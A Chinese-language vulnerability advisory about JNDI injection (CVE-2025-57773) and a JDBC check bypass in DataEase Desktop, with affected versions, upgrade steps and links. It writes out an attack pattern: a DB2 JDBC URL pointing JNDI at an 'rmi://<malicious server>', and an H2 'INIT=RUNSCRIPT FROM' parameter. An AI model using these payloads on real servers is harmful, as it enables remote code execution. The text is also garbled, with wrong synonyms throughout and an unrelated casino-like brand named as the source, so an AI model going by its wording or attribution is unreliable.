【误差通告】Dataease JNDI注入误差(CVE-2025-57773)

宣布时间 2025-08-26

一、误差概述


误差名称

DataEase JNDI注入误差

CVE   ID

CVE-2025-57773

误差类型

RCE

发明时间

2025-08-26

误差评分

8.2

误差品级

高危

攻击向量

网络

所需权限

使用难度

用户交互

不需要

PoC/EXP

已果真

在野使用

未发明


DataEase是一款开源的数据可视化与剖析平台,支持多种数据源接入,提供报表、看板、可视化大屏等功效,资助用户实现数据盘问、剖析与展示 。它支持JDBC、API等多种数据毗连方法,适用于BI报表、数据剖析及可视化场景 。


2025年8月26日,尊龙凯官网入口集团VSRC监测到DataEase Desktop保存DataEase JNDI注入误差(CVE-2025-57773) 。由于DB2数据源参数缺乏有用校验,攻击者可通过结构恶意JDBC URL(如jdbc:db2://…;clientRerouteServerListJNDIName=rmi://<恶意服务器>),触发JNDI远程加载,并团结commons-collections 4.x与aspectjweaver(<1.9.4)的Gadget链实现反序列化攻击,从而抵达恣意文件写入或远程代码执行的目的,最终可能完全控制服务器,同时Dataease Desktop还保存Dataease JDBC逻辑绕过误差(CVE-2025-57772),由于CalciteProvider#getConnection要领中保存JDBC类型校验缺陷,攻击者可通过伪造数据库类型为oracle,绕过H2驱动相关过滤逻辑,强制程序加载恶意结构的H2 JDBC URL 。该URL可直接包括危险参数(如INIT=RUNSCRIPT FROM),实现远程加载并执行恶意SQL剧本,导致敏感数据泄露、系统被控制及进一步横向渗透 。


二、影响规模


DataEase Desktop ≤ v2.10.11 。


三、清静步伐


3.1 升级版本


官方已宣布清静补丁,升级至如下版本 。

DataEase Desktop ≥v2.10.12 。


3.2 暂时步伐


若是暂时无法升级主程序,可通过将AspectJWeaver升级至≥1.9.4来降低CVE-2025-57773的可使用性,同时建议将commons-collections升级至≥4.4以镌汰潜在危害 。


3.3 通用建议


? 按期更新系统补丁,镌汰系统误差,提升服务器的清静性 。

增强系统和网络的会见控制,修改防火墙战略,关闭非须要的应用端口或服务,镌汰将危险服务(如SSH、RDP等)袒露到公网,镌汰攻击面 。

使用企业级清静产品,提升企业的网络清静性能 。

增强系统用户和权限管理,启用多因素认证机制和最小权限原则,用户和软件权限应坚持在最低限度 。

启用强密码战略并设置为按期修改 。


3.4 参考链接


https://nvd.nist.gov/vuln/detail/CVE-2025-57773/

https://github.com/dataease/dataease/security/advisories/GHSA-v37q-vh67-9rqv

https://github.com/dataease/dataease/security/advisories/GHSA-7r8j-6whv-4j5p/